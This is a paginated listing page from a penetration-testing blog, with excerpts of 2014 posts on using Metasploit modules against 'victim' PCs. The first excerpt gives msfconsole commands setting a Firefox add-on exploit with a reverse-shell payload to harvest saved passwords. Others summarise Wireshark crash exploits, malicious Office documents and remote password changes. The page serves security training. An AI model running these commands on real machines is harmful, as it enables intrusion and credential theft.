Skip to content

Hacking Articles

Raj Chandel's Blog

  • Courses We Offer
  • CTF Challenges
  • Penetration Testing
  • Web Penetration Testing
  • Red Teaming
  • Donate us
Penetration Testing

Exploit Save Password in Mozilla Firefox in Remote Windows, Linux or MAC PC

June 13, 2014 by raj1 Min Reading

Open Kali terminal type msfconsole Now type use exploit/multi/browser/firefox_xpi_bootstrapped_addon msf exploit (firefox_xpi_bootstrapped_addon)>set payload firefox/shell_reverse_tcp msf exploit (firefox_xpi_bootstrapped_addon)>set lhost 192.168.1.9 (IP of Local Host) msf exploit (firefox_xpi_bootstrapped_addon)>set uripath / msf

Penetration Testing

How to Gather MUICache Entries in Remote Windows PC

June 10, 2014 by raj2 Min Reading

According to Nirsoft.net, “each time that you start using a new application, Windows operating system automatically extract the application name from the version resource of

Penetration Testing

How to Crash Running Wireshark of Remote PC using CAPWAP Dissector DoS

June 4, 2014 by raj1 Min Reading

This module injects a malformed UDP packet to crash Wireshark and TShark 1.8.0 to 1.8.7, as well as 1.6.0 to 1.6.15. The vulnerability exists in

Penetration Testing

Hack Remote PC using Wireshark wiretap/mpeg.c Stack Buffer Overflow

May 5, 2014 by raj1 Min Reading

This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5 by generating a malicious file.) Exploit Targets Wireshark <= 1.8.12/1.10.5 Requirement Attacker: kali Linux

Penetration Testing

Hack Remote Victim PC with MS Office Document

May 5, 2014 by raj1 Min Reading

This module creates a malicious RTF file that when opened in vulnerable versions of Microsoft Word will lead to code execution. The flaw exists in

Penetration Testing

Set New Password of Victim PC Remotely

May 4, 2014 by raj1 Min Reading

This module will attempt to change the password of the targeted account. The typical usage is to change a newly created account’s password on a

Penetration Testing

Hack Remote Windows PC using WinRAR Filename Spoofing

April 11, 2014 by raj2 Min Reading

This module abuses a filename spoofing vulnerability in WinRAR. The vulnerability exists when opening ZIP files. The file names showed in WinRAR when opening a

Penetration Testing

How to Gather Skype Logs, Firefox History and Chrome history of Remote Victim PC

April 7, 2014 by raj1 Min Reading

Gathers Skype chat logs, Firefox history, and Chrome history data from the target machine. Exploit Targets Windows 7 Requirement Attacker: kali Linux Victim PC: Windows

Others

Hack ALL Games in Windows 7 for Instant Win (Enable Debug Mode)

April 6, 2014 by raj2 Min Reading

Step1:- Download Resource Hacker from Here Step2:- Open Resource Hacker and click open. Step3:- Now Open C:\Program Files\Microsoft Games\Solitaire\en-US and drag and drop Solitaire.exe.mui in resource hacker You’ll

Posts pagination

Previous 1 … 148 149 150 … 156 Next

Categories

Join Our Training Program

Join Our Telegram Channel

Join Our Discord Channel

Cyber Security Mindmap

Follow us on Twitter

Follow us on Linkedin

© All Rights Reserved 2021 Theme: Prefer by Template Sell.